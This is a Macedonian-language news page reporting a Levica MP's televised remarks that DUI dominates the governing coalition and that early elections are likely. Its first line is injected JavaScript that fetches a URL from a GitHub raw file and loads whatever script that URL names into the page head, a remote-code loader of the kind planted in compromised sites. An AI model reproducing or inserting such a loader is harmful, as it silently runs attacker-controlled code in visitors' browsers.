;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Крмов: ДУИ не ги интересира дали премиерот е Албанец, туку дали премиерот е од ДУИ - Антропол
АктуелноЛокално

Крмов: ДУИ не ги интересира дали премиерот е Албанец, туку дали премиерот е од ДУИ

Во вечерашното гостување во емисијата „Само вистина”, пратеникот од Левица, Борислав Крмов, зборуваше за моменталната ситуација во власта.

„Јас мислам дека не требаше да се влезе во таа игра на ДУИ, затоа што нив не ги интересира дали Премиериот ќе биде Албанец, туку дали премиерот ќе биде од ДУИ. Таа етнизација која што се форсира од 1991, а посебно од 2001 година, не донесе ништо добро и во тој смисол не требаше да се влезе во таа игра. Ние од Левица имаме од сите националности, дали ако би предложиле член Албанец од Левица ќе биде прифатлив? Апсолутно не.

Ние во Левица не се делиме на тој начин, општеството треба да оди кон кохезија и спојување, а не кон поделби. За жал, сите албански партии во Собранието негуваат еден национал-шовинизам и се одделуваат од македонската нација.”

На прашањето за предвремени парламентарни избори, Крмов рече дека очекува избори оваа пролет или есен.

„Ние го начнавме тоа прашање за радикализација кога се случи мистериозното исчезнување на Кастриот Реџепи и неговото тврдење за каде се наоѓал. Радикализацијата мислиме дека ќе си дојде сама по себе, како што ќе се заострува енергетската криза и моменталното покачување на цени на сите производи, посебно на прехранбените, а замрзнувањето на цените беше предоцна. Така да, ние мислиме дека сепак ќе има предвремени избори дали на пролет, дали на есен. Мислиме дека природно ќе дојде состојбата на радикализацијата.”

На прашањето за моменталната состојба во Владата, пратеникот од Левица кажа дека, според него, во оваа владејачка коалиција, сите работи ги диктира Али Ахмети.

„Власта е спремна сѐ да продадат за да се оддржат на власт, таму нема никаква долгорочна визија. Преку 47 раководни позиции доби Алтернатива со само ЧЕТИРИ пратеника (едни од најбитните ресори, како што се Министерството за здравство и МЕПСО).Имате ситуација каде СДСМ квалитативно веќе и е малцинска партија, таму им остана само Министерство за труд и социјала и МВР, при што најбитните ресори веќе ги дадоа. Гледате дека ДУИ е еден вид на непоместлива политичка сила кои не ги даваат своите ресори, таму министрите ги бира Али Ахмети, а не нашиот премиер. Така да, веќе имате ситуација каде што веќе дури и квантитативно најголемата партија во власта паѓа под помалите партии.”